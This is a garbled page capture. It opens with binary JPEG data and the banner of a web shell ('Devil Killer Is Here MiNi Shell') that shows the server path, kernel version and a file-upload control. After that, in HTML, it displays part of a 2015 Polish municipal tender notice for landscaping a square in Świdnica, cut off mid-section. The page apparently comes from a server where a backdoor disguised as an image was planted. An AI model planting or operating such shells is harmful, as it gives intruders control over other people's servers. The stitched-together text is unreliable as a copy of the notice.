JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151208/180891-N-2015.html

<p class="kh_header"><b>Świdnica: Wykonanie robót budowlanych, w ramach zadania inwestycyjnego pn.:  Zagospodarowanie skweru pl.1000-lecia PP</b><br>
<b>Numer ogłoszenia: 180891 - 2015; data zamieszczenia: 08.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.swidnica.bip-gov.info.pl/bip/glowna</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych, w ramach zadania inwestycyjnego pn.:  Zagospodarowanie skweru pl.1000-lecia PP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	OPIS PRZEDMIOTU ZAMÓWIENIA.
3.1.	Przedmiotem zamówienia są roboty budowlane i rewitalizacja zieleni w ramach zadania inwestycyjnego pn.:
 Zagospodarowanie skweru pl.1000-lecia PP
3.2.	Szczegółowy opis przedmiotu zamówienia. 
Lokalizacja - działka nr  2380,   Obr. 0004 Śródmieście,   AM-12 położona jest na obszarze ujętym  w wojewódzkiej i gminnej ewidencji zabytków objętym   ustaleniami   Mpzp   Świdnicy   Śródmieście   -   Południe    zatwierdzonego   uchwałą nr XLVI/546/10 Rady Miejskiej w Świdnicy z dnia 16 czerwca 2010 r.
Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej tj. projekcie budowlanym, wykonawczym, szczegółowej specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót autorstwa firmy Sztuka Ogrodów LART DES  JARDINS Sp. z o.o. ul. K. Olszewskiego 178/1  51-648  Wrocław. 
3.3.	Załączone   do   dokumentacji    projektowej    przedmiary   robót   nie   stanowią   opisu przedmiotu zamówienia.    Przedmiary    robót     stanowią     wyłącznie     materiał    pomocniczy   dla    wskazania technologii  robót,  która   rzutuje   na    wysokość  ceny   ryczałtowej.  Kalkulacja  Wykonawcy   winna stanowić   wycenę    kompletu    robót     niezbędnych     do     wykonania przedmiotu    zamówienia. Przedmiarów nie  należy  wypełniać  ani  załączać  do  oferty. 
3.4.  Wykonawca   zobowiązuje   się   wykonać  roboty,  które  nie  zostały wyszczególnione w   przedmiarze robót,   a   są   konieczne   do  realizacji   przedmiotu    umowy  zgodnie   z    projektem    budowlanym,       wykonawczym,    szczegółową      specyfikacją    techniczną   wykonania   i  odbioru   robót,    zapisami SIWZ  oraz  zgodnie  z   obowiązującymi przepisami   prawa   a   w    szczególności     ustawą     Prawo   Budowlane (Dz. U. z  2013 r. Poz.1409) oraz rozporządzeniami powiązanymi. 
3.5.W przypadku rozbieżności w ustaleniach poszczególnych dokumentów, obowiązuje następująca  kolejność ich ważności:
1.	Specyfikacja Istotnych Warunków Zamówienia.
2.	Specyfikacja Techniczna Wykonania i Odbioru Robót.
3.	Projekt Wykonawczy.
4.	Projekt Budowlany.
5.	Oferta Wykonawcy.
3.6. Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień  Publicznych (CPV):

 45100000-8 Przygotowanie terenu pod budowę 
 45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
 45232100-3 Roboty pomocnicze w zakresie wodociągów
 45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków
 45112730-1-Prace z zakresu małej architektury
 45233161-5 Roboty budowlane w zakresie ścieżek pieszych
 45314310-7 Układanie kabli 
 45316100-6 Instalowanie urządzeń oświetlenia zewnętrznego
45310000-3 Roboty instalacyjne elektryczne
  45332200-5 Roboty instalacji hydraulicznej
 45332300-6 Roboty instalacyjne kanalizacyjne
 45332400-7 Roboty instalacyjne w zakresie urządzeń sanitarnych
 45310000-3 Roboty instalacyjne elektryczne
 45111000-8 Roboty w zakresie burzenia, roboty ziemne
 45223500-1 Konstrukcje z betonu zbrojonego
 45320000-6 Roboty izolacyjne
 45262512-3 Kamieniarskie roboty wykończeniowe
 77231000-8 Usługi gospodarki leśnej
 45112710-2 Roboty w zakresie kształtowania terenu
 77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych

4 WARUNKI REALIZACJI, ODBIORU I ROZLICZENIA ROBÓT:

4.1. Warunki realizacji robót:
1.Zamawiający zapewnia nadzór inwestorski zgodnie z warunkami pozwolenia na budowę.
2.Zamawiający zapewnia nadzór autorski.
3.Przedmiot zamówienia należy realizować zgodnie ze specyfikacją techniczną wykonania i odbioru robót, projektem, zasadami sztuki budowlanej oraz zgodnie z zasadami BHP. 
4.Roboty budowlane powinny być wykonywane  zgodnie z  reżimem  technologicznym, określonym przez Polskie  Normy, producentów poszczególnych elementów, produktów, materiałów i urządzeń. Wszystkie użyte do budowy materiały muszą być nowe, odpowiadać parametrom podanym  w projekcie i powinny posiadać odpowiedni atest i świadectwo dopuszczenia wydane przez odpowiednie uprawnione instytucje, zezwalające na  stosowanie ich w budownictwie.  Dokumenty te przed wbudowaniem należy przedłożyć  inspektorowi nadzoru inwestorskiego  i   Zamawiającemu w formie karty materiałowej.
5.Wykonawca zobowiązany jest do przestrzegania warunków instytucji opiniujących projekt.
6.Obsługa  geodezyjna,  inwentaryzacja  powykonawcza,  organizacja,  oznakowanie  i  zagospodarowanie zaplecza  budowy   oraz   inne   nakłady   nie  stanowiące   wartości  robót budowlanych, a  niezbędne do wykonania  przedmiotu umowy należy objąć ceną ofertową.
7.    Inwentaryzację geodezyjną powykonawczą należy wykonać w formie drukowanej  na pełnych arkuszach sekcji w czterech  egzemplarzach  z  potwierdzeniem  przyjęcia do  państwowego  zasobu  geodezyjnego i  kartograficznego   oraz   formie numerycznej  w formacie  TIFF - 400 dpi  w  pełnych   sekcjach   bez     dodatkowych  treści  (pieczątek,  metryk,  zamalowań  itp.).  W operacie geodezyjnym  należy  zamieścić zestawienia długości wykonanych sieci oraz powierzchni wykonanych nawierzchni (chodników, terenów zielonych  itp.)
8. Zamawiający   zachowuje   prawo   dostępu   do   terenu   budowy   dla  wskazanych  przez siebie innych wykonawców,  a Wykonawca tego prawa nie może ograniczyć (np.:  Zakład  Gazowniczy,   Świdnickie Przedsiębiorstwo Wodociągów i Kanalizacji, Tauron Dystrybucja, itp.). 
9.   Wykonawca jest odpowiedzialny za szkody powstałe  w  trakcie   realizacji   robót   również   wobec osób trzecich  oraz w wyniku nieterminowego  ich  naprawienia. Wykonawca   ponosi pełną odpowiedzialność cywilno - prawną  za  ewentualne  uszkodzenia  pojazdów,  urazy  pieszych  spowodowane  brakiem   lub niewłaściwym oznakowaniem, zabezpieczeniem terenu prowadzonych robót.
10.  Wykonawca będzie ponosił koszty organizacji terenu budowy,  koszty oznakowania  i  zagospodarowania zaplecza  budowy, zużycia wody  i  energii w okresie realizacji  robót, koszty   utrzymania  i  konserwacji tymczasowych   obiektów i urządzeń  związanych z terenem budowy oraz   inne  nakłady  nie  stanowiące wartości robót budowlanych, a niezbędne  do wykonania przedmiotu    umowy. W/w koszty  Wykonawca ujmie w cenie ofertowej.
11.  Wykonawca   umieści   na   budowie  w widocznym miejscu tablicę informacyjną, ogłoszenie zawierające dane dotyczące bezpieczeństwa pracy i ochrony zdrowia. 
12.  Wykonawca zapewni sprawowanie kierownictwa budowy i   robót   przez osoby posiadające odpowiednie kwalifikacje  zawodowe   i  uprawnienia   do  kierowania    robotami    budowlanymi    w   odpowiednich specjalnościach, zgodnie z wymogami Prawa Budowlanego.
13. Wykonawca zrealizuje własnym staraniem tymczasowe obiekty i urządzenia  na terenie  placu budowy: punkt poboru wody, punkt poboru energii elektrycznej, zabezpieczenie terenu budowy. 
 14.  Wykonawca  ma  obowiązek  we  własnym  zakresie  i   na własny  koszt  sporządzić projekt zastępczej  organizacji ruchu na czas wykonywania swoich prac wraz z jej wykonaniem. 
 15.  Wykonawca zobowiązany jest uzgodnić z Inwestorem miejsce składowania  materiałów  pochodzących z rozbiórki posiadających wartość budowlaną. 
16. Wykonawca zobowiązany jest do przekazania na właściwe wysypisko odpadów materiałów z rozbiórki a nie  nadających się do ponownego wbudowania.
17. Wykonawca zobowiązany jest do zapewnienia dostępu do wszystkich nieruchomości  dla osób  pieszych przez cały okres trwania budowy. 
18. Wszelkie   rozbieżności  stwierdzone w  trakcie   prowadzenia  robót  pomiędzy  założeniami  przyjętymi w  projekcie  a  stanem  faktycznym, mającymi  wpływ  na prawidłowe wykonanie prac, będą uzgadniane z projektantem w ramach nadzoru autorskiego.
19. Po wyborze oferty,  przed  podpisaniem umowy,  Wykonawca   przedłoży  Zamawiającemu   uzgodniony z Zamawiającym harmonogram rzeczowo-finansowy realizacji zamówienia.
20. Za koordynację robót  branżowych i  prowadzenie dokumentacji  budowy odpowiadać  będzie  kierownik budowy. 
21. Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu budowy i przekazania go Zamawiającemu.
22. Wykonanie nasadzeń nie później niż do dnia 28.10.2016 r.   zgodnie ze specyfikacją techniczną zieleni.
23. Wykonawca ma obowiązek pielęgnować drzewa, krzewy i trawniki do 30.10.2017 r. w celu zachowania ich żywotności (m.in. podlewać, zabezpieczać rośliny na zimę,  nawozić, zwalczać choroby i szkodniki, kosić, odchwaszczać, wymieniać rośliny, które  nie zachowały żywotności ).
4.2 Warunki odbioru robót:
1Wykonawca  zgłasza  Inspektorowi  Nadzoru  do   odbioru   wszystkie   roboty   zanikowe    oraz   zamiar wykonania nasadzeń i okazania planowanych do nasadzeń roślin.
2.Odbiory  częściowe   robót   będą   zakończone   protokołami   odbioru  elementów wykonanych robót potwierdzonymi przez Inspektora Nadzoru.
3. Dokumentem potwierdzającym przejęcie przez Zamawiającego wykonanego przedmiotu zamówienia jest protokół końcowy odbioru robót, podpisany przez strony umowy, którego integralną częścią będą dokumenty niżej wymienione dostarczone przez Wykonawcę Inspektorowi Nadzoru inwestorskiego         w dniu zgłoszenia gotowości do odbioru końcowego zadania  w tym: 
- oryginał dziennika budowy, 
- protokoły technicznego odbioru robót związanych z wykonywaniem przedmiotu zamówienia, 
- dokumentację powykonawczą, 
- atesty i aprobaty na wbudowane materiały, 
- protokoły badań i sprawdzeń jakości robót i materiałów, w tym świadectwa zezwalające na stosowanie materiałów w budownictwie,
- inwentaryzację geodezyjną powykonawczą,
- oświadczenie kierownika budowy:
-o zgodności wykonania obiektu budowlanego z projektem budowlanym i warunkami pozwolenia na budowę oraz przepisami,
- o doprowadzeniu do należytego stanu i porządku terenu budowy, a także - w razie korzystania ulicy, sąsiedniej nieruchomości, budynku lub lokalu,
-o właściwym zagospodarowaniu terenów przyległych, jeżeli eksploatacja wybudowanego obiektu jest uzależniona od ich odpowiedniego zagospodarowania,
- kartę gwarancyjną na wykonane roboty budowlane.
4.   Zamawiający   przystąpi   do  czynności   odbiorowych   przedmiotu   zamówienia   w   terminie do 10 dni roboczych  od  daty zgłoszenia gotowości do odbioru robót. Podstawą rozpoczęcia czynności odbioru końcowego  będzie  zawiadomienie pisemne Wykonawcy, wpis kierownika budowy do dziennika budowy o zakończeniu wszystkich robót będących przedmiotem zamówienia potwierdzony ze strony Zamawiającego przez  inspektora nadzoru oraz potwierdzenie inspektora nadzoru poprawności i kompletności przekazanych mu    przez Wykonawcę dokumentów odbiorowych. Strony postanawiają, że z czynności odbioru będzie spisany   protokół zawierający wszelkie ustalenia dokonane w toku odbioru, jak też terminy wyznaczone na usunięcie stwierdzonych przy odbiorze wad. 
5. W dniu zgłoszenia gotowości do odbioru końcowego Wykonawca dostarcza Inspektorowi Nadzoru   inwestorskiego wszystkie wymagane dokumenty odbiorowe: protokoły technicznego odbioru robót związanych z wykonywaniem przedmiotu zamówienia, dokumentację powykonawczą, atesty i aprobaty na wbudowane materiały i rośliny. Niekompletna dokumentacja odbiorowa może być przyczyną odmowy przez Zamawiającego przystąpienia do czynności odbioru końcowego. 
6.  Podstawą do  podpisania przez Zamawiającego protokołu końcowego   odbioru   robót   będzie  wykonanie przedmiotu   zamówienia.   Zakończenie   robót   i   zgłoszenie   przez   Wykonawcę  gotowości do odbioru końcowego nastąpić winno w terminie do 28.10.2016 r.
7. Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania   terenu   budowy   i   przekazania go  Zamawiającemu.
4.3 Warunki rozliczenia robót:
1.  Za wykonanie przedmiotu umowy ustala się  wynagrodzenie  ryczałtowe  zgodne  z  ceną  ofertową  brutto Wykonawcy, uwzględniające wszystkie koszty wynikające z obowiązków Wykonawcy określonych w niniejszej  SIWZ i w projekcie umowy.
2 . Strony postanawiają, że roboty objęte umową będą rozliczane nie częściej jak jeden raz w miesiącu fakturami częściowymi do wysokości 85 % kwoty brutto wynagrodzenia Wykonawcy; proporcjonalnie do zaawansowania rzeczowego elementów określonych w harmonogramie rzeczowo-finansowym. Do każdej faktury musi być sporządzony stosowny protokół odbioru elementów robót podpisany przez kierownika budowy i potwierdzony przez Inspektora Nadzoru inwestorskiego oraz dokumenty potwierdzające dokonanie przez Wykonawcę zapłaty za roboty wykonane przez Podwykonawców (dalszych Podwykonawców), pod rygorem nie przyjęcia faktury.
3. Należność za faktury częściowe i fakturę końcową zostanie uregulowana po przedstawieniu Zamawiającemu oświadczenia Podwykonawcy o uregulowaniu przez Wykonawcę  wszystkich zobowiązań w pełnej wartości robót wykonanych przez Podwykonawcę w ramach niniejszej umowy wraz z dokumentem rozliczeniowym potwierdzającym dokonanie przez Wykonawcę zapłaty za roboty wykonane przez Podwykonawcę  w okresie rozliczeniowym (łącznie z kopią przelewu bankowego potwierdzoną przez Wykonawcę  za zgodność z oryginałem) lub po pisemnym oświadczeniu Wykonawcy, że roboty w okresie rozliczeniowym, którego dotyczy faktura wykonywał siłami własnymi. 
4. Faktura końcowa może być wystawiona po protokolarnym końcowym odbiorze robót przez Zamawiającego i przekazaniu uporządkowanego terenu budowy Zamawiającemu.
5. W przypadku nie dostarczenia przez Wykonawcę  do faktury oświadczenia Podwykonawcy  o uregulowaniu przez Wykonawcę  wszystkich zobowiązań w pełnej wartości robót wykonanych przez Podwykonawcę w ramach niniejszej umowy wraz z dokumentem rozliczeniowym potwierdzającym dokonanie przez Wykonawcę  zapłaty za roboty wykonane przez Podwykonawcę w okresie rozliczeniowym (łącznie z kopią przelewu bankowego potwierdzoną przez Wykonawcę  za zgodność z oryginałem) lub oświadczenia Wykonawcy, że roboty w okresie rozliczeniowym, którego dotyczy faktura wykonywał siłami własnymi,  Zamawiający uprawniony jest do wstrzymania zapłaty wynagrodzenia dla Wykonawcy lub zapłaty wynagrodzenia bezpośrednio jego Podwykonawcom. 
6. Termin płatności faktur ustala się do 30 dni od daty dostarczenia ich Zamawiającemu łącznie  z wymaganymi  załącznikami.
4.4 . Informacje dodatkowe
Szczegółowe warunki dotyczące odstąpienia od umowy zawarte są w projekcie umowy dołączonym do SIWZ.
5.TERMIN WYKONANIA ZAMÓWIENIA.
Wymagany termin realizacji zadania:
1. Rozpoczęcie realizacji:  od dnia podpisania umowy,
2.a) Zakończenie realizacji robót budowlanych - 30.06.2016r. - rozumiane jako data zakończenia robót budowlanych i konserwatorskich, oraz montaż małej architektury i udostępnienia do użytkowania dla ruchu pieszych, 
b) Zakończenie wykonania nasadzeń: - 28.10. 2016 r  . rozumiane jako data całkowitego zakończenia realizacji przedmiotu zamówienia, potwierdzona protokołem odbioru końcowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.12.00-0, 45.23.21.00-3, 45.23.13.00-8, 45.11.27.30-1, 45.23.31.61-5, 45.31.43.10-7, 45.31.61.00-6, 45.31.00.00-3, 45.33.22.00-5, 45.33.23.00-6, 45.33.24.00-7, 45.31.00.00-3, 45.11.10.00-8, 45.22.35.00-1, 45.32.00.00-6, 45.26.25.12-3, 77.23.10.00-8, 45.11.27.10-2, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.WYMAGANIA DOTYCZĄCE WADIUM.

9.1.Oferta powinna być zabezpieczona wadium w wysokości  20.000,00 zł (słownie: dwadzieścia  tysięcy złotych)
9.2.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 
9.3.Wadium może być wniesione w formach określonych w art.45 ust.6 ustawy Pzp, z tym, że:
    a/ złożone  w  pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO S.A. I 
        Oddział     w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem
       winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania
       ofert.

     WYKONAWCY  UWAGA!
     W przypadku korzystania przez Wykonawcę z systemu umożliwiającego dokonywanie natychmiastowych przelewów między kontami w różnych bankach, Wykonawca zobowiązany jest tak opisać tytuł przelewu aby wynikało z niego kto wpłaca wadium i jakiego przetargu dotyczy wpłata.

   b/ złożone w gwarancjach (bankowych, ubezpieczeniowych):
z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 i 4a ustawy Pzp tj. w przypadku, gdy Wykonawca:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, oraz:
-	w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 z przyczyn leżących po jego stronie , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa  w art. 87 ust.2 pkt. 3, co powodowało  brak możliwości wybrania oferty złożonej przez  Wykonawcę  jako najkorzystniejszej.
9.4.Wszystkie  formy  wadium  powinny  mieć  określoną  ważność zgodną z okresem związania ofertą.
      Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
9.5.Złożone  w   innej   niż   pieniądz   formie winno być złożone w kasie Zamawiającego, jako depozyt, 
      złożony za potwierdzeniem, przed upływem terminu składania ofert. 
9.6.Dowód przelewu lub potwierdzenie depozytu należy dołączyć w oryginale do oferty. 
9.7.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w pkt 9.12.
9.8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający  zwraca  wadium 
        niezwłocznie   po   zawarciu   umowy   w   sprawie   zamówienia   publicznego   oraz     wniesieniu
        zabezpieczenia należytego wykonania umowy.
9.9.Zamawiający   zwraca   wadium,  na   wniosek   Wykonawcy, który wycofał ofertę przed upływem 
        terminu składania ofert.
9.10.Zamawiający   zażąda   ponownego   wniesienia   wadium  przez   Wykonawcę, któremu zwrócono
         wadium na podstawie, pkt 9.8 jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta 
         została wybrana,   jako   najkorzystniejsza. Wykonawca   wniesie wadium w terminie określonym 
         przez Zamawiającego. 
9.11.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie,
         o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 
         ust.1 ustawy Pzp, lub  pełnomocnictw chyba, że udowodni, że  wynika to z przyczyn nieleżących
         po jego stronie.
9.12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została
        wybrana:
a/	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
b/	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c/	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d/	w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3   z przyczyn leżących po jego    stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1,  pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa  w art. 87 ust.2 pkt. 3, co powodowało  brak możliwości wybrania oferty złożonej przez  Wykonawcę  jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie):
jednej  roboty budowlanej o wartości nie mniejszej niż 450.000,00 PLN brutto  obejmującej przebudowę lub  budowę  parków,   skwerów   lub   placów,   obiektów   małej   architektury    wraz   z infrastrukturą   techniczną obejmującą   roboty instalacyjne wod-kan i    oświetlenie   terenu oraz nasadzenia zieleni o powierzchni co  najmniej 0,3 ha  wraz z załączeniem dowodów dotyczących  tej roboty, określających, czy roboty te zostały wykonane w sposób   należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
